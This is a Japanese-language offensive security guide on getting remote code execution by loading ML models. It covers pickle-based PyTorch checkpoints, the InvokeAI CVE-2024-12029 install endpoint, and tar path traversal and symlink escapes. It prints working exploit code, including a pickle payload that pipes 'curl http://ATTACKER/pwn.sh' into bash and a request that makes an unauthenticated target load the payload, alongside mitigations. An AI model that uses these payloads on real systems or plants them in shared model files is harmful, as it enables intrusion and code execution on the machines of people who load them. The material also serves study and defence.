Models RCE

Reading time: 12 minutes

Loading models to RCE

Machine Learning modelsは通常、ONNX、TensorFlow、PyTorchなどの異なるフォーマットで共有されます。これらのモデルは、開発者のマシンや本番システムにロードされて使用されます。通常、モデルには悪意のあるコードが含まれていないはずですが、モデルのロードライブラリの脆弱性や意図された機能として、モデルがシステム上で任意のコードを実行するために使用される場合があります。

執筆時点でのこの種の脆弱性のいくつかの例は以下の通りです：

さらに、PyTorchで使用されるようなPythonピクルベースのモデルは、weights_only=Trueでロードされない場合、システム上で任意のコードを実行するために使用される可能性があります。したがって、テーブルにリストされていない場合でも、すべてのピクルベースのモデルはこの種の攻撃に特に脆弱である可能性があります。

🆕 InvokeAI RCE via torch.load (CVE-2024-12029)

InvokeAIはStable-Diffusionのための人気のあるオープンソースのWebインターフェースです。バージョン5.3.1 – 5.4.2は、ユーザーが任意のURLからモデルをダウンロードしてロードできるRESTエンドポイント/api/v2/models/installを公開しています。

内部的に、このエンドポイントは最終的に次のように呼び出します：

checkpoint = torch.load(path, map_location=torch.device("meta"))

提供されたファイルがPyTorchチェックポイント（*.ckpt）である場合、torch.loadはピクルデシリアライズを実行します。コンテンツがユーザー制御のURLから直接来るため、攻撃者はチェックポイント内にカスタム__reduce__メソッドを持つ悪意のあるオブジェクトを埋め込むことができます。このメソッドはデシリアライズ中に実行され、**リモートコード実行（RCE）**を引き起こします。

この脆弱性にはCVE-2024-12029（CVSS 9.8、EPSS 61.17%）が割り当てられました。

攻撃の手順

1. 悪意のあるチェックポイントを作成します：

# payload_gen.py
import pickle, torch, os

class Payload:
def __reduce__(self):
return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))

with open("payload.ckpt", "wb") as f:
pickle.dump(Payload(), f)

2. あなたが制御するHTTPサーバーにpayload.ckptをホストします（例: http://ATTACKER/payload.ckpt）。
3. 脆弱なエンドポイントをトリガーします（認証は不要です）：

import requests

requests.post(
"http://TARGET:9090/api/v2/models/install",
params={
"source": "http://ATTACKER/payload.ckpt",  # remote model URL
"inplace": "true",                         # write inside models dir
# the dangerous default is scan=false → no AV scan
},
json={},                                         # body can be empty
timeout=5,
)

4. InvokeAIがファイルをダウンロードすると、torch.load()が呼び出され、os.systemガジェットが実行され、攻撃者はInvokeAIプロセスのコンテキストでコード実行を得ます。

既製のエクスプロイト: Metasploit モジュール exploit/linux/http/invokeai_rce_cve_2024_12029 は全体のフローを自動化します。

条件

• InvokeAI 5.3.1-5.4.2（スキャンフラグデフォルト false） • /api/v2/models/install が攻撃者によって到達可能 • プロセスがシェルコマンドを実行する権限を持っている

緩和策

• InvokeAI ≥ 5.4.3 にアップグレード – パッチはデフォルトで scan=True を設定し、デシリアライズ前にマルウェアスキャンを実行します。
• チェックポイントをプログラム的に読み込む際は、torch.load(file, weights_only=True) または新しい torch.load_safe ヘルパーを使用します。
• モデルソースのために許可リスト/署名を強制し、最小特権でサービスを実行します。

⚠️ 任意の Pythonピクルベースのフォーマット（多くの .pt, .pkl, .ckpt, .pth ファイルを含む）は、信頼できないソースからデシリアライズすることが本質的に安全ではないことを忘れないでください。

リバースプロキシの背後で古いInvokeAIバージョンを実行し続ける必要がある場合のアドホックな緩和策の例:

location /api/v2/models/install {
deny all;                       # block direct Internet access
allow 10.0.0.0/8;               # only internal CI network can call it
}

例 – 悪意のあるPyTorchモデルの作成

• モデルを作成する:

# attacker_payload.py
import torch
import os

class MaliciousPayload:
def __reduce__(self):
# This code will be executed when unpickled (e.g., on model.load_state_dict)
return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))

# Create a fake model state dict with malicious content
malicious_state = {"fc.weight": MaliciousPayload()}

# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")

• モデルをロードする:

# victim_load.py
import torch
import torch.nn as nn

class MyModel(nn.Module):
def __init__(self):
super().__init__()
self.fc = nn.Linear(10, 1)

model = MyModel()

# ⚠️ This will trigger code execution from pickle inside the .pth file
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))

# /tmp/pwned.txt is created even if you get an error

モデルとパストラバーサル

このブログ投稿でコメントされているように、異なるAIフレームワークで使用されるほとんどのモデルフォーマットはアーカイブに基づいており、通常は.zipです。したがって、これらのフォーマットを悪用してパストラバーサル攻撃を実行し、モデルがロードされているシステムから任意のファイルを読み取ることが可能かもしれません。

例えば、以下のコードを使用すると、ロードされたときに/tmpディレクトリにファイルを作成するモデルを作成できます:

import tarfile

def escape(member):
member.name = "../../tmp/hacked"     # break out of the extract dir
return member

with tarfile.open("traversal_demo.model", "w:gz") as tf:
tf.add("harmless.txt", filter=escape)

次のコードを使用すると、ロードされたときに/tmpディレクトリへのシンボリックリンクを作成するモデルを作成できます:

import tarfile, pathlib

TARGET  = "/tmp"        # where the payload will land
PAYLOAD = "abc/hacked"

def link_it(member):
member.type, member.linkname = tarfile.SYMTYPE, TARGET
return member

with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
tf.add(PAYLOAD)                      # rides the symlink

深堀り: Keras .keras デシリアライズとガジェットハンティング

. keras の内部、Lambda-layer RCE、≤ 3.8 の任意インポート問題、およびホワイトリスト内のポストフィックスガジェット発見に関する集中ガイドについては、次を参照してください:

Keras Model Deserialization Rce And Gadget Hunting

参考文献

• OffSec blog – "CVE-2024-12029 – InvokeAIの信頼できないデータのデシリアライズ"
• InvokeAI パッチコミット 756008d
• Rapid7 Metasploit モジュールドキュメント
• PyTorch – torch.load のセキュリティ考慮事項